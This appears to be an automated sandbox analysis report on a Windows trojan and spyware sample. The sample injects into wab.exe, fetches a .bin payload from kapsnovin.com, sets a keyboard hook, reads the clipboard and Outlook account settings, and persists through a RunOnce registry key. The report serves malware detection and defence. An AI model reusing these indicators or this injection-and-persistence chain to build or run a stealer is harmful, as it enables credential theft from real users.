              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: kapsnovin.com
              Source: global trafficHTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: kapsnovin.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004052EE

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4692, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00404B2B5_2_00404B2B
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004070405_2_00407040
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004068695_2_00406869
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E1B5C17_2_33E1B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E271947_2_33E27194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406E8F10_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B04010_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043610D10_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044731010_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044A49010_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040755A10_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043C56010_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B61010_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044D6C010_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004476F010_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044B87010_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044081D10_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041495710_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004079EE10_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00407AEB10_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044AA8010_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412AA910_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B7410_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404B0310_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044BBD810_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404BE510_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00404C7610_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00415CFE10_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00416D7210_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D3010_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00446D8B10_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040D04411_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040503811_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050A911_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040511A11_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051AB11_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004382F311_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043057511_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043B67111_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0041F6CD11_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004119CF11_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00439B1111_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00438E5411_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00412F6711_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0043CF1811_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050C212_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004014AB12_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040513312_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051A412_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040124612_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040CA4612_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040523512_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004032C812_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040168912_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402F6012_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_034BEB74 Sleep,NtProtectVirtualMemory,7_2_034BEB74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00401806 NtdllDefWindowProc_W,10_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004018C0 NtdllDefWindowProc_W,10_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004016FC NtdllDefWindowProc_A,11_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004017B6 NtdllDefWindowProc_A,11_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402CAC NtdllDefWindowProc_A,12_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00402D66 NtdllDefWindowProc_A,12_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: invalid certificate
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile read: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeJump to behavior
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33005
              Source: unknownProcess created: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ijcjazbdkoecd
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tehbtruwywwhnexk
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbogJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbogJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ijcjazbdkoecdJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tehbtruwywwhnexkJump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004032A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,12_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\Videos\frifundne.iniJump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\AppData\Local\Temp\nskBC66.tmpJump to behavior
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@11/32@3/3
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00402095 CoCreateInstance,5_2_00402095
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004045AF
              Source: wab.exe, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.31198174813.0000000033D50000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: wab.exe, 0000000A.00000003.26367919578.00000000050A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,10_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,10_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\ourvbpld-RBN2WW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,10_2_0040B58D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic file information: File size 2716872 > 1048576
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000005.00000002.26296961645.0000000002CA8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.26296210823.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RC_S23_3274 Or_amento ADP 231019_5_5009.exe PID: 4212, type: MEMORYSTR
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_10002DE0 push eax; ret 5_2_10002E0E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E12806 push ecx; ret 7_2_33E12819
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044693D push ecx; ret 10_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00451D54 push eax; ret 10_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00444355 push ecx; ret 11_2_00444365
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_004446E4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004446D0 push eax; ret 11_2_0044470C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0044AC84 push eax; ret 11_2_0044AC91
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414060 push eax; ret 12_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00414039 push ecx; ret 12_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_10001B18
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\AppData\Local\Temp\nswC001.tmp\BgImage.dllJump to dropped file
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\AppData\Local\Temp\nswC001.tmp\nsExec.dllJump to dropped file
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeFile created: C:\Users\user\AppData\Local\Temp\nswC001.tmp\nsDialogs.dllJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\Surmulendes\Emphasising.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BerrypickingJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BerrypickingJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BerrypickingJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BerrypickingJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_004047C6
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2692Thread sleep count: 3590 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4712Thread sleep count: 83 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4712Thread sleep time: -41500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7296Thread sleep count: 5330 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7296Thread sleep time: -15990000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3590 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
